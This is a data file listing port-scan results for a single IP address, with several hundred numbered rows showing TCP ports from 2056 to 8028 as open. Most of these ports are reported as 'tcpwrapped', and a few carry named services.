6227149.126.72.220 2056 tcp tcpwrapped open
6228149.126.72.220 2057 tcp tcpwrapped open
6229149.126.72.220 2058 tcp tcpwrapped open
6230149.126.72.220 2059 tcp tcpwrapped open
6231149.126.72.220 2060 tcp tcpwrapped open
6232149.126.72.220 2061 tcp tcpwrapped open
6233149.126.72.220 2062 tcp tcpwrapped open
6234149.126.72.220 2063 tcp tcpwrapped open
6235149.126.72.220 2064 tcp tcpwrapped open
6236149.126.72.220 2065 tcp tcpwrapped open
6237149.126.72.220 2066 tcp tcpwrapped open
6238149.126.72.220 2067 tcp tcpwrapped open
6239149.126.72.220 2068 tcp tcpwrapped open
6240149.126.72.220 2069 tcp tcpwrapped open
6241149.126.72.220 2070 tcp tcpwrapped open
6242149.126.72.220 2072 tcp tcpwrapped open
6243149.126.72.220 2082 tcp tcpwrapped open
6244149.126.72.220 2083 tcp tcpwrapped open
6245149.126.72.220 2087 tcp tcpwrapped open
6246149.126.72.220 2096 tcp tcpwrapped open
6247149.126.72.220 2100 tcp tcpwrapped open
6248149.126.72.220 2108 tcp tcpwrapped open
6249149.126.72.220 2200 tcp tcpwrapped open
6250149.126.72.220 2209 tcp tcpwrapped open
6251149.126.72.220 2222 tcp tcpwrapped open
6252149.126.72.220 2226 tcp tcpwrapped open
6253149.126.72.220 2248 tcp tcpwrapped open
6254149.126.72.220 2344 tcp tcpwrapped open
6255149.126.72.220 2345 tcp tcpwrapped open
6256149.126.72.220 2353 tcp tcpwrapped open
6257149.126.72.220 2363 tcp tcpwrapped open
6258149.126.72.220 2423 tcp tcpwrapped open
6259149.126.72.220 2433 tcp tcpwrapped open
6260149.126.72.220 2435 tcp tcpwrapped open
6261149.126.72.220 2443 tcp tcpwrapped open
6262149.126.72.220 2453 tcp tcpwrapped open
6263149.126.72.220 2480 tcp tcpwrapped open
6264149.126.72.220 2548 tcp tcpwrapped open
6265149.126.72.220 2549 tcp tcpwrapped open
6266149.126.72.220 2550 tcp tcpwrapped open
6267149.126.72.220 2551 tcp tcpwrapped open
6268149.126.72.220 2552 tcp tcpwrapped open
6269149.126.72.220 2553 tcp tcpwrapped open
6270149.126.72.220 2554 tcp tcpwrapped open
6271149.126.72.220 2555 tcp tcpwrapped open
6272149.126.72.220 2556 tcp tcpwrapped open
6273149.126.72.220 2557 tcp tcpwrapped open
6274149.126.72.220 2558 tcp tcpwrapped open
6275149.126.72.220 2559 tcp tcpwrapped open
6276149.126.72.220 2560 tcp tcpwrapped open
6277149.126.72.220 2561 tcp tcpwrapped open
6278149.126.72.220 2562 tcp tcpwrapped open
6279149.126.72.220 2563 tcp tcpwrapped open
6280149.126.72.220 2566 tcp tcpwrapped open
6281149.126.72.220 2567 tcp tcpwrapped open
6282149.126.72.220 2568 tcp tcpwrapped open
6283149.126.72.220 2569 tcp tcpwrapped open
6284149.126.72.220 2570 tcp tcpwrapped open
6285149.126.72.220 2572 tcp tcpwrapped open
6286149.126.72.220 2598 tcp tcpwrapped open
6287149.126.72.220 2599 tcp tcpwrapped open
6288149.126.72.220 2850 tcp tcpwrapped open
6289149.126.72.220 2985 tcp tcpwrapped open
6290149.126.72.220 2995 tcp tcpwrapped open
6291149.126.72.220 3000 tcp tcpwrapped open
6292149.126.72.220 3001 tcp tcpwrapped open
6293149.126.72.220 3002 tcp tcpwrapped open
6294149.126.72.220 3003 tcp tcpwrapped open
6295149.126.72.220 3004 tcp tcpwrapped open
6296149.126.72.220 3005 tcp tcpwrapped open
6297149.126.72.220 3006 tcp tcpwrapped open
6298149.126.72.220 3007 tcp tcpwrapped open
6299149.126.72.220 3008 tcp tcpwrapped open
6300149.126.72.220 3009 tcp tcpwrapped open
6301149.126.72.220 3010 tcp tcpwrapped open
6302149.126.72.220 3011 tcp tcpwrapped open
6303149.126.72.220 3012 tcp tcpwrapped open
6304149.126.72.220 3013 tcp tcpwrapped open
6305149.126.72.220 3014 tcp tcpwrapped open
6306149.126.72.220 3015 tcp tcpwrapped open
6307149.126.72.220 3016 tcp tcpwrapped open
6308149.126.72.220 3017 tcp tcpwrapped open
6309149.126.72.220 3018 tcp tcpwrapped open
6310149.126.72.220 3019 tcp tcpwrapped open
6311149.126.72.220 3020 tcp tcpwrapped open
6312149.126.72.220 3021 tcp tcpwrapped open
6313149.126.72.220 3022 tcp tcpwrapped open
6314149.126.72.220 3030 tcp tcpwrapped open
6315149.126.72.220 3047 tcp tcpwrapped open
6316149.126.72.220 3048 tcp tcpwrapped open
6317149.126.72.220 3049 tcp tcpwrapped open
6318149.126.72.220 3050 tcp tcpwrapped open
6319149.126.72.220 3051 tcp tcpwrapped open
6320149.126.72.220 3052 tcp tcpwrapped open
6321149.126.72.220 3053 tcp tcpwrapped open
6322149.126.72.220 3054 tcp tcpwrapped open
6323149.126.72.220 3055 tcp tcpwrapped open
6324149.126.72.220 3056 tcp tcpwrapped open
6325149.126.72.220 3057 tcp tcpwrapped open
6326149.126.72.220 3058 tcp tcpwrapped open
6327149.126.72.220 3059 tcp tcpwrapped open
6328149.126.72.220 3060 tcp tcpwrapped open
6329149.126.72.220 3061 tcp tcpwrapped open
6330149.126.72.220 3062 tcp tcpwrapped open
6331149.126.72.220 3063 tcp tcpwrapped open
6332149.126.72.220 3064 tcp tcpwrapped open
6333149.126.72.220 3065 tcp tcpwrapped open
6334149.126.72.220 3066 tcp tcpwrapped open
6335149.126.72.220 3067 tcp tcpwrapped open
6336149.126.72.220 3068 tcp tcpwrapped open
6337149.126.72.220 3069 tcp tcpwrapped open
6338149.126.72.220 3070 tcp tcpwrapped open
6339149.126.72.220 3071 tcp tcpwrapped open
6340149.126.72.220 3072 tcp tcpwrapped open
6341149.126.72.220 3073 tcp tcpwrapped open
6342149.126.72.220 3074 tcp tcpwrapped open
6343149.126.72.220 3075 tcp tcpwrapped open
6344149.126.72.220 3076 tcp tcpwrapped open
6345149.126.72.220 3077 tcp tcpwrapped open
6346149.126.72.220 3078 tcp tcpwrapped open
6347149.126.72.220 3079 tcp tcpwrapped open
6348149.126.72.220 3080 tcp tcpwrapped open
6349149.126.72.220 3081 tcp tcpwrapped open
6350149.126.72.220 3082 tcp tcpwrapped open
6351149.126.72.220 3083 tcp tcpwrapped open
6352149.126.72.220 3084 tcp tcpwrapped open
6353149.126.72.220 3085 tcp tcpwrapped open
6354149.126.72.220 3086 tcp tcpwrapped open
6355149.126.72.220 3087 tcp tcpwrapped open
6356149.126.72.220 3088 tcp tcpwrapped open
6357149.126.72.220 3089 tcp tcpwrapped open
6358149.126.72.220 3090 tcp tcpwrapped open
6359149.126.72.220 3091 tcp tcpwrapped open
6360149.126.72.220 3092 tcp tcpwrapped open
6361149.126.72.220 3093 tcp tcpwrapped open
6362149.126.72.220 3094 tcp tcpwrapped open
6363149.126.72.220 3095 tcp tcpwrapped open
6364149.126.72.220 3096 tcp tcpwrapped open
6365149.126.72.220 3097 tcp tcpwrapped open
6366149.126.72.220 3098 tcp tcpwrapped open
6367149.126.72.220 3099 tcp tcpwrapped open
6368149.126.72.220 3100 tcp tcpwrapped open
6369149.126.72.220 3101 tcp tcpwrapped open
6370149.126.72.220 3102 tcp tcpwrapped open
6371149.126.72.220 3103 tcp tcpwrapped open
6372149.126.72.220 3104 tcp tcpwrapped open
6373149.126.72.220 3105 tcp tcpwrapped open
6374149.126.72.220 3106 tcp tcpwrapped open
6375149.126.72.220 3107 tcp tcpwrapped open
6376149.126.72.220 3108 tcp tcpwrapped open
6377149.126.72.220 3109 tcp tcpwrapped open
6378149.126.72.220 3110 tcp tcpwrapped open
6379149.126.72.220 3111 tcp tcpwrapped open
6380149.126.72.220 3112 tcp tcpwrapped open
6381149.126.72.220 3113 tcp tcpwrapped open
6382149.126.72.220 3114 tcp tcpwrapped open
6383149.126.72.220 3115 tcp tcpwrapped open
6384149.126.72.220 3116 tcp tcpwrapped open
6385149.126.72.220 3117 tcp tcpwrapped open
6386149.126.72.220 3118 tcp tcpwrapped open
6387149.126.72.220 3119 tcp tcpwrapped open
6388149.126.72.220 3120 tcp tcpwrapped open
6389149.126.72.220 3121 tcp tcpwrapped open
6390149.126.72.220 3150 tcp tcpwrapped open
6391149.126.72.220 3155 tcp tcpwrapped open
6392149.126.72.220 3160 tcp tcpwrapped open
6393149.126.72.220 3165 tcp tcpwrapped open
6394149.126.72.220 3270 tcp tcpwrapped open
6395149.126.72.220 3299 tcp tcpwrapped open
6396149.126.72.220 3306 tcp tcpwrapped open
6397149.126.72.220 3333 tcp tcpwrapped open
6398149.126.72.220 3389 tcp tcpwrapped open
6399149.126.72.220 3391 tcp tcpwrapped open
6400149.126.72.220 3400 tcp tcpwrapped open
6401149.126.72.220 3401 tcp tcpwrapped open
6402149.126.72.220 3402 tcp tcpwrapped open
6403149.126.72.220 3403 tcp tcpwrapped open
6404149.126.72.220 3404 tcp tcpwrapped open
6405149.126.72.220 3405 tcp tcpwrapped open
6406149.126.72.220 3406 tcp tcpwrapped open
6407149.126.72.220 3407 tcp tcpwrapped open
6408149.126.72.220 3408 tcp tcpwrapped open
6409149.126.72.220 3409 tcp tcpwrapped open
6410149.126.72.220 3410 tcp tcpwrapped open
6411149.126.72.220 3412 tcp tcpwrapped open
6412149.126.72.220 3443 tcp tcpwrapped open
6413149.126.72.220 3500 tcp tcpwrapped open
6414149.126.72.220 3510 tcp tcpwrapped open
6415149.126.72.220 3521 tcp tcpwrapped open
6416149.126.72.220 3522 tcp tcpwrapped open
6417149.126.72.220 3523 tcp tcpwrapped open
6418149.126.72.220 3524 tcp tcpwrapped open
6419149.126.72.220 3530 tcp tcpwrapped open
6420149.126.72.220 3531 tcp tcpwrapped open
6421149.126.72.220 3540 tcp tcpwrapped open
6422149.126.72.220 3548 tcp tcpwrapped open
6423149.126.72.220 3549 tcp tcpwrapped open
6424149.126.72.220 3550 tcp tcpwrapped open
6425149.126.72.220 3551 tcp tcpwrapped open
6426149.126.72.220 3552 tcp tcpwrapped open
6427149.126.72.220 3553 tcp tcpwrapped open
6428149.126.72.220 3554 tcp tcpwrapped open
6429149.126.72.220 3555 tcp tcpwrapped open
6430149.126.72.220 3556 tcp tcpwrapped open
6431149.126.72.220 3557 tcp tcpwrapped open
6432149.126.72.220 3558 tcp tcpwrapped open
6433149.126.72.220 3559 tcp tcpwrapped open
6434149.126.72.220 3560 tcp tcpwrapped open
6435149.126.72.220 3561 tcp tcpwrapped open
6436149.126.72.220 3562 tcp tcpwrapped open
6437149.126.72.220 3563 tcp tcpwrapped open
6438149.126.72.220 3566 tcp tcpwrapped open
6439149.126.72.220 3567 tcp tcpwrapped open
6440149.126.72.220 3568 tcp tcpwrapped open
6441149.126.72.220 3569 tcp tcpwrapped open
6442149.126.72.220 3570 tcp tcpwrapped open
6443149.126.72.220 3572 tcp tcpwrapped open
6444149.126.72.220 3580 tcp tcpwrapped open
6445149.126.72.220 3590 tcp tcpwrapped open
6446149.126.72.220 3790 tcp tcpwrapped open
6447149.126.72.220 3791 tcp tcpwrapped open
6448149.126.72.220 3792 tcp tcpwrapped open
6449149.126.72.220 3793 tcp tcpwrapped open
6450149.126.72.220 3794 tcp tcpwrapped open
6451149.126.72.220 3838 tcp tcpwrapped open
6452149.126.72.220 3841 tcp tcpwrapped open
6453149.126.72.220 3842 tcp tcpwrapped open
6454149.126.72.220 3950 tcp tcpwrapped open
6455149.126.72.220 3951 tcp tcpwrapped open
6456149.126.72.220 3952 tcp tcpwrapped open
6457149.126.72.220 3953 tcp tcpwrapped open
6458149.126.72.220 3954 tcp adrep open
6459149.126.72.220 4000 tcp tcpwrapped open
6460149.126.72.220 4001 tcp newoak open
6461149.126.72.220 4002 tcp mlchat-proxy open
6462149.126.72.220 4021 tcp nexus-portal open
6463149.126.72.220 4022 tcp dnox open
6464149.126.72.220 4023 tcp esnm-zoning open
6465149.126.72.220 4043 tcp nirp open
6466149.126.72.220 4072 tcp zieto-sock open
6467149.126.72.220 4080 tcp lorica-in open
6468149.126.72.220 4085 tcp ezmessagesrv open
6469149.126.72.220 4120 tcp minirem open
6470149.126.72.220 4147 tcp vrxpservman open
6471149.126.72.220 4148 tcp hhb-handheld open
6472149.126.72.220 4150 tcp poweralert-nsa open
6473149.126.72.220 4155 tcp bzr open
6474149.126.72.220 4160 tcp jini-discovery open
6475149.126.72.220 4165 tcp altcp open
6476149.126.72.220 4172 tcp pcoip open
6477149.126.72.220 4243 tcp vrml-multi-use open
6478149.126.72.220 4244 tcp vrml-multi-use open
6479149.126.72.220 4250 tcp vrml-multi-use open
6480149.126.72.220 4300 tcp corelccam open
6481149.126.72.220 4333 tcp msql open
6482149.126.72.220 4343 tcp unicall open
6483149.126.72.220 4344 tcp vinainstall open
6484149.126.72.220 4400 tcp ds-srv open
6485149.126.72.220 4401 tcp tcpwrapped open
6486149.126.72.220 4402 tcp tcpwrapped open
6487149.126.72.220 4430 tcp tcpwrapped open
6488149.126.72.220 4431 tcp tcpwrapped open
6489149.126.72.220 4432 tcp tcpwrapped open
6490149.126.72.220 4434 tcp tcpwrapped open
6491149.126.72.220 4435 tcp tcpwrapped open
6492149.126.72.220 4436 tcp tcpwrapped open
6493149.126.72.220 4437 tcp tcpwrapped open
6494149.126.72.220 4439 tcp tcpwrapped open
6495149.126.72.220 4440 tcp tcpwrapped open
6496149.126.72.220 4443 tcp tcpwrapped open
6497149.126.72.220 4444 tcp tcpwrapped open
6498149.126.72.220 4445 tcp tcpwrapped open
6499149.126.72.220 4451 tcp tcpwrapped open
6500149.126.72.220 4455 tcp tcpwrapped open
6501149.126.72.220 4457 tcp tcpwrapped open
6502149.126.72.220 4459 tcp tcpwrapped open
6503149.126.72.220 4461 tcp tcpwrapped open
6504149.126.72.220 4463 tcp tcpwrapped open
6505149.126.72.220 4477 tcp tcpwrapped open
6506149.126.72.220 4482 tcp tcpwrapped open
6507149.126.72.220 4500 tcp tcpwrapped open
6508149.126.72.220 4502 tcp tcpwrapped open
6509149.126.72.220 4505 tcp tcpwrapped open
6510149.126.72.220 4572 tcp tcpwrapped open
6511149.126.72.220 4602 tcp tcpwrapped open
6512149.126.72.220 4620 tcp tcpwrapped open
6513149.126.72.220 4643 tcp tcpwrapped open
6514149.126.72.220 4848 tcp tcpwrapped open
6515149.126.72.220 4933 tcp tcpwrapped open
6516149.126.72.220 4993 tcp tcpwrapped open
6517149.126.72.220 5000 tcp tcpwrapped open
6518149.126.72.220 5001 tcp tcpwrapped open
6519149.126.72.220 5002 tcp tcpwrapped open
6520149.126.72.220 5003 tcp tcpwrapped open
6521149.126.72.220 5004 tcp tcpwrapped open
6522149.126.72.220 5005 tcp tcpwrapped open
6523149.126.72.220 5006 tcp tcpwrapped open
6524149.126.72.220 5007 tcp tcpwrapped open
6525149.126.72.220 5008 tcp tcpwrapped open
6526149.126.72.220 5009 tcp tcpwrapped open
6527149.126.72.220 5010 tcp tcpwrapped open
6528149.126.72.220 5011 tcp tcpwrapped open
6529149.126.72.220 5022 tcp tcpwrapped open
6530149.126.72.220 5050 tcp tcpwrapped open
6531149.126.72.220 5053 tcp tcpwrapped open
6532149.126.72.220 5060 tcp tcpwrapped open
6533149.126.72.220 5061 tcp tcpwrapped open
6534149.126.72.220 5080 tcp tcpwrapped open
6535149.126.72.220 5083 tcp tcpwrapped open
6536149.126.72.220 5089 tcp tcpwrapped open
6537149.126.72.220 5090 tcp tcpwrapped open
6538149.126.72.220 5100 tcp tcpwrapped open
6539149.126.72.220 5105 tcp tcpwrapped open
6540149.126.72.220 5119 tcp tcpwrapped open
6541149.126.72.220 5120 tcp tcpwrapped open
6542149.126.72.220 5130 tcp tcpwrapped open
6543149.126.72.220 5140 tcp tcpwrapped open
6544149.126.72.220 5150 tcp tcpwrapped open
6545149.126.72.220 5160 tcp tcpwrapped open
6546149.126.72.220 5180 tcp tcpwrapped open
6547149.126.72.220 5201 tcp tcpwrapped open
6548149.126.72.220 5222 tcp tcpwrapped open
6549149.126.72.220 5223 tcp tcpwrapped open
6550149.126.72.220 5224 tcp tcpwrapped open
6551149.126.72.220 5225 tcp tcpwrapped open
6552149.126.72.220 5226 tcp tcpwrapped open
6553149.126.72.220 5227 tcp tcpwrapped open
6554149.126.72.220 5228 tcp tcpwrapped open
6555149.126.72.220 5229 tcp tcpwrapped open
6556149.126.72.220 5230 tcp tcpwrapped open
6557149.126.72.220 5231 tcp tcpwrapped open
6558149.126.72.220 5232 tcp tcpwrapped open
6559149.126.72.220 5233 tcp tcpwrapped open
6560149.126.72.220 5234 tcp tcpwrapped open
6561149.126.72.220 5235 tcp tcpwrapped open
6562149.126.72.220 5236 tcp tcpwrapped open
6563149.126.72.220 5237 tcp tcpwrapped open
6564149.126.72.220 5238 tcp tcpwrapped open
6565149.126.72.220 5239 tcp tcpwrapped open
6566149.126.72.220 5240 tcp tcpwrapped open
6567149.126.72.220 5241 tcp tcpwrapped open
6568149.126.72.220 5242 tcp tcpwrapped open
6569149.126.72.220 5243 tcp tcpwrapped open
6570149.126.72.220 5244 tcp tcpwrapped open
6571149.126.72.220 5245 tcp tcpwrapped open
6572149.126.72.220 5246 tcp tcpwrapped open
6573149.126.72.220 5247 tcp tcpwrapped open
6574149.126.72.220 5248 tcp tcpwrapped open
6575149.126.72.220 5249 tcp tcpwrapped open
6576149.126.72.220 5250 tcp tcpwrapped open
6577149.126.72.220 5251 tcp tcpwrapped open
6578149.126.72.220 5252 tcp tcpwrapped open
6579149.126.72.220 5253 tcp tcpwrapped open
6580149.126.72.220 5254 tcp tcpwrapped open
6581149.126.72.220 5255 tcp tcpwrapped open
6582149.126.72.220 5256 tcp tcpwrapped open
6583149.126.72.220 5257 tcp tcpwrapped open
6584149.126.72.220 5258 tcp tcpwrapped open
6585149.126.72.220 5259 tcp tcpwrapped open
6586149.126.72.220 5260 tcp tcpwrapped open
6587149.126.72.220 5261 tcp tcpwrapped open
6588149.126.72.220 5262 tcp tcpwrapped open
6589149.126.72.220 5263 tcp tcpwrapped open
6590149.126.72.220 5264 tcp tcpwrapped open
6591149.126.72.220 5265 tcp tcpwrapped open
6592149.126.72.220 5266 tcp tcpwrapped open
6593149.126.72.220 5267 tcp tcpwrapped open
6594149.126.72.220 5268 tcp tcpwrapped open
6595149.126.72.220 5269 tcp tcpwrapped open
6596149.126.72.220 5270 tcp tcpwrapped open
6597149.126.72.220 5271 tcp tcpwrapped open
6598149.126.72.220 5272 tcp tcpwrapped open
6599149.126.72.220 5273 tcp tcpwrapped open
6600149.126.72.220 5274 tcp tcpwrapped open
6601149.126.72.220 5275 tcp tcpwrapped open
6602149.126.72.220 5276 tcp tcpwrapped open
6603149.126.72.220 5277 tcp tcpwrapped open
6604149.126.72.220 5278 tcp tcpwrapped open
6605149.126.72.220 5279 tcp tcpwrapped open
6606149.126.72.220 5280 tcp tcpwrapped open
6607149.126.72.220 5440 tcp tcpwrapped open
6608149.126.72.220 5443 tcp tcpwrapped open
6609149.126.72.220 5456 tcp tcpwrapped open
6610149.126.72.220 5494 tcp tcpwrapped open
6611149.126.72.220 5495 tcp tcpwrapped open
6612149.126.72.220 5500 tcp tcpwrapped open
6613149.126.72.220 5503 tcp tcpwrapped open
6614149.126.72.220 5552 tcp tcpwrapped open
6615149.126.72.220 5555 tcp tcpwrapped open
6616149.126.72.220 5556 tcp tcpwrapped open
6617149.126.72.220 5557 tcp tcpwrapped open
6618149.126.72.220 5567 tcp tcpwrapped open
6619149.126.72.220 5568 tcp tcpwrapped open
6620149.126.72.220 5569 tcp tcpwrapped open
6621149.126.72.220 5590 tcp tcpwrapped open
6622149.126.72.220 5591 tcp tcpwrapped open
6623149.126.72.220 5592 tcp tcpwrapped open
6624149.126.72.220 5593 tcp tcpwrapped open
6625149.126.72.220 5594 tcp tcpwrapped open
6626149.126.72.220 5595 tcp tcpwrapped open
6627149.126.72.220 5596 tcp tcpwrapped open
6628149.126.72.220 5597 tcp tcpwrapped open
6629149.126.72.220 5598 tcp tcpwrapped open
6630149.126.72.220 5599 tcp tcpwrapped open
6631149.126.72.220 5600 tcp tcpwrapped open
6632149.126.72.220 5601 tcp tcpwrapped open
6633149.126.72.220 5602 tcp tcpwrapped open
6634149.126.72.220 5603 tcp tcpwrapped open
6635149.126.72.220 5604 tcp tcpwrapped open
6636149.126.72.220 5605 tcp tcpwrapped open
6637149.126.72.220 5606 tcp tcpwrapped open
6638149.126.72.220 5607 tcp tcpwrapped open
6639149.126.72.220 5608 tcp tcpwrapped open
6640149.126.72.220 5609 tcp tcpwrapped open
6641149.126.72.220 5613 tcp tcpwrapped open
6642149.126.72.220 5614 tcp tcpwrapped open
6643149.126.72.220 5620 tcp tcpwrapped open
6644149.126.72.220 5630 tcp tcpwrapped open
6645149.126.72.220 5640 tcp tcpwrapped open
6646149.126.72.220 5650 tcp tcpwrapped open
6647149.126.72.220 5660 tcp tcpwrapped open
6648149.126.72.220 5671 tcp tcpwrapped open
6649149.126.72.220 5672 tcp tcpwrapped open
6650149.126.72.220 5673 tcp tcpwrapped open
6651149.126.72.220 5680 tcp tcpwrapped open
6652149.126.72.220 5696 tcp tcpwrapped open
6653149.126.72.220 5698 tcp tcpwrapped open
6654149.126.72.220 5701 tcp tcpwrapped open
6655149.126.72.220 5721 tcp tcpwrapped open
6656149.126.72.220 5900 tcp tcpwrapped open
6657149.126.72.220 5901 tcp tcpwrapped open
6658149.126.72.220 5902 tcp tcpwrapped open
6659149.126.72.220 5903 tcp tcpwrapped open
6660149.126.72.220 5904 tcp tcpwrapped open
6661149.126.72.220 5905 tcp tcpwrapped open
6662149.126.72.220 5906 tcp tcpwrapped open
6663149.126.72.220 5907 tcp tcpwrapped open
6664149.126.72.220 5908 tcp tcpwrapped open
6665149.126.72.220 5909 tcp tcpwrapped open
6666149.126.72.220 5910 tcp tcpwrapped open
6667149.126.72.220 5911 tcp tcpwrapped open
6668149.126.72.220 5912 tcp tcpwrapped open
6669149.126.72.220 5913 tcp tcpwrapped open
6670149.126.72.220 5914 tcp tcpwrapped open
6671149.126.72.220 5915 tcp tcpwrapped open
6672149.126.72.220 5916 tcp tcpwrapped open
6673149.126.72.220 5917 tcp tcpwrapped open
6674149.126.72.220 5918 tcp tcpwrapped open
6675149.126.72.220 5919 tcp tcpwrapped open
6676149.126.72.220 5920 tcp tcpwrapped open
6677149.126.72.220 5984 tcp tcpwrapped open
6678149.126.72.220 5985 tcp tcpwrapped open
6679149.126.72.220 5986 tcp tcpwrapped open
6680149.126.72.220 5987 tcp tcpwrapped open
6681149.126.72.220 5988 tcp tcpwrapped open
6682149.126.72.220 5989 tcp tcpwrapped open
6683149.126.72.220 5990 tcp tcpwrapped open
6684149.126.72.220 5991 tcp tcpwrapped open
6685149.126.72.220 5992 tcp tcpwrapped open
6686149.126.72.220 5993 tcp tcpwrapped open
6687149.126.72.220 5994 tcp tcpwrapped open
6688149.126.72.220 5995 tcp tcpwrapped open
6689149.126.72.220 5996 tcp tcpwrapped open
6690149.126.72.220 5997 tcp tcpwrapped open
6691149.126.72.220 5998 tcp tcpwrapped open
6692149.126.72.220 5999 tcp tcpwrapped open
6693149.126.72.220 6000 tcp tcpwrapped open
6694149.126.72.220 6001 tcp tcpwrapped open
6695149.126.72.220 6002 tcp tcpwrapped open
6696149.126.72.220 6003 tcp tcpwrapped open
6697149.126.72.220 6004 tcp tcpwrapped open
6698149.126.72.220 6005 tcp tcpwrapped open
6699149.126.72.220 6006 tcp tcpwrapped open
6700149.126.72.220 6007 tcp tcpwrapped open
6701149.126.72.220 6008 tcp tcpwrapped open
6702149.126.72.220 6009 tcp tcpwrapped open
6703149.126.72.220 6010 tcp tcpwrapped open
6704149.126.72.220 6011 tcp tcpwrapped open
6705149.126.72.220 6021 tcp tcpwrapped open
6706149.126.72.220 6060 tcp tcpwrapped open
6707149.126.72.220 6061 tcp tcpwrapped open
6708149.126.72.220 6081 tcp tcpwrapped open
6709149.126.72.220 6100 tcp tcpwrapped open
6710149.126.72.220 6102 tcp tcpwrapped open
6711149.126.72.220 6134 tcp tcpwrapped open
6712149.126.72.220 6161 tcp tcpwrapped open
6713149.126.72.220 6331 tcp tcpwrapped open
6714149.126.72.220 6348 tcp tcpwrapped open
6715149.126.72.220 6379 tcp tcpwrapped open
6716149.126.72.220 6380 tcp tcpwrapped open
6717149.126.72.220 6433 tcp tcpwrapped open
6718149.126.72.220 6440 tcp tcpwrapped open
6719149.126.72.220 6443 tcp tcpwrapped open
6720149.126.72.220 6488 tcp tcpwrapped open
6721149.126.72.220 6500 tcp tcpwrapped open
6722149.126.72.220 6505 tcp tcpwrapped open
6723149.126.72.220 6510 tcp tcpwrapped open
6724149.126.72.220 6511 tcp tcpwrapped open
6725149.126.72.220 6512 tcp tcpwrapped open
6726149.126.72.220 6514 tcp tcpwrapped open
6727149.126.72.220 6543 tcp tcpwrapped open
6728149.126.72.220 6544 tcp tcpwrapped open
6729149.126.72.220 6560 tcp tcpwrapped open
6730149.126.72.220 6561 tcp tcpwrapped open
6731149.126.72.220 6565 tcp tcpwrapped open
6732149.126.72.220 6580 tcp tcpwrapped open
6733149.126.72.220 6581 tcp tcpwrapped open
6734149.126.72.220 6590 tcp tcpwrapped open
6735149.126.72.220 6601 tcp tcpwrapped open
6736149.126.72.220 6603 tcp tcpwrapped open
6737149.126.72.220 6605 tcp tcpwrapped open
6738149.126.72.220 6661 tcp tcpwrapped open
6739149.126.72.220 6662 tcp tcpwrapped open
6740149.126.72.220 6666 tcp tcpwrapped open
6741149.126.72.220 6686 tcp tcpwrapped open
6742149.126.72.220 6688 tcp tcpwrapped open
6743149.126.72.220 6700 tcp tcpwrapped open
6744149.126.72.220 6755 tcp tcpwrapped open
6745149.126.72.220 6775 tcp tcpwrapped open
6746149.126.72.220 6779 tcp tcpwrapped open
6747149.126.72.220 6789 tcp tcpwrapped open
6748149.126.72.220 6799 tcp tcpwrapped open
6749149.126.72.220 7000 tcp tcpwrapped open
6750149.126.72.220 7001 tcp tcpwrapped open
6751149.126.72.220 7002 tcp tcpwrapped open
6752149.126.72.220 7003 tcp tcpwrapped open
6753149.126.72.220 7004 tcp tcpwrapped open
6754149.126.72.220 7005 tcp tcpwrapped open
6755149.126.72.220 7007 tcp tcpwrapped open
6756149.126.72.220 7010 tcp tcpwrapped open
6757149.126.72.220 7011 tcp tcpwrapped open
6758149.126.72.220 7021 tcp tcpwrapped open
6759149.126.72.220 7070 tcp tcpwrapped open
6760149.126.72.220 7071 tcp tcpwrapped open
6761149.126.72.220 7079 tcp tcpwrapped open
6762149.126.72.220 7080 tcp tcpwrapped open
6763149.126.72.220 7081 tcp tcpwrapped open
6764149.126.72.220 7082 tcp tcpwrapped open
6765149.126.72.220 7083 tcp tcpwrapped open
6766149.126.72.220 7084 tcp tcpwrapped open
6767149.126.72.220 7085 tcp tcpwrapped open
6768149.126.72.220 7086 tcp tcpwrapped open
6769149.126.72.220 7087 tcp tcpwrapped open
6770149.126.72.220 7088 tcp tcpwrapped open
6771149.126.72.220 7090 tcp tcpwrapped open
6772149.126.72.220 7171 tcp tcpwrapped open
6773149.126.72.220 7172 tcp tcpwrapped open
6774149.126.72.220 7272 tcp tcpwrapped open
6775149.126.72.220 7348 tcp tcpwrapped open
6776149.126.72.220 7403 tcp tcpwrapped open
6777149.126.72.220 7433 tcp tcpwrapped open
6778149.126.72.220 7441 tcp tcpwrapped open
6779149.126.72.220 7443 tcp tcpwrapped open
6780149.126.72.220 7444 tcp tcpwrapped open
6781149.126.72.220 7445 tcp tcpwrapped open
6782149.126.72.220 7473 tcp tcpwrapped open
6783149.126.72.220 7500 tcp tcpwrapped open
6784149.126.72.220 7537 tcp tcpwrapped open
6785149.126.72.220 7687 tcp tcpwrapped open
6786149.126.72.220 7700 tcp tcpwrapped open
6787149.126.72.220 7771 tcp tcpwrapped open
6788149.126.72.220 7773 tcp tcpwrapped open
6789149.126.72.220 7774 tcp tcpwrapped open
6790149.126.72.220 7775 tcp tcpwrapped open
6791149.126.72.220 7776 tcp tcpwrapped open
6792149.126.72.220 7777 tcp tcpwrapped open
6793149.126.72.220 7778 tcp tcpwrapped open
6794149.126.72.220 7779 tcp tcpwrapped open
6795149.126.72.220 7788 tcp tcpwrapped open
6796149.126.72.220 7799 tcp tcpwrapped open
6797149.126.72.220 7998 tcp tcpwrapped open
6798149.126.72.220 7999 tcp tcpwrapped open
6799149.126.72.220 8000 tcp tcpwrapped open
6800149.126.72.220 8001 tcp tcpwrapped open
6801149.126.72.220 8002 tcp tcpwrapped open
6802149.126.72.220 8003 tcp tcpwrapped open
6803149.126.72.220 8004 tcp tcpwrapped open
6804149.126.72.220 8005 tcp tcpwrapped open
6805149.126.72.220 8006 tcp tcpwrapped open
6806149.126.72.220 8007 tcp tcpwrapped open
6807149.126.72.220 8008 tcp tcpwrapped open
6808149.126.72.220 8009 tcp tcpwrapped open
6809149.126.72.220 8010 tcp tcpwrapped open
6810149.126.72.220 8011 tcp tcpwrapped open
6811149.126.72.220 8012 tcp tcpwrapped open
6812149.126.72.220 8013 tcp tcpwrapped open
6813149.126.72.220 8014 tcp tcpwrapped open
6814149.126.72.220 8015 tcp tcpwrapped open
6815149.126.72.220 8016 tcp tcpwrapped open
6816149.126.72.220 8017 tcp tcpwrapped open
6817149.126.72.220 8018 tcp tcpwrapped open
6818149.126.72.220 8019 tcp tcpwrapped open
6819149.126.72.220 8020 tcp tcpwrapped open
6820149.126.72.220 8021 tcp tcpwrapped open
6821149.126.72.220 8022 tcp tcpwrapped open
6822149.126.72.220 8023 tcp tcpwrapped open
6823149.126.72.220 8024 tcp tcpwrapped open
6824149.126.72.220 8025 tcp tcpwrapped open
6825149.126.72.220 8026 tcp tcpwrapped open
6826149.126.72.220 8027 tcp tcpwrapped open
6827149.126.72.220 8028 tcp tcpwrapped open
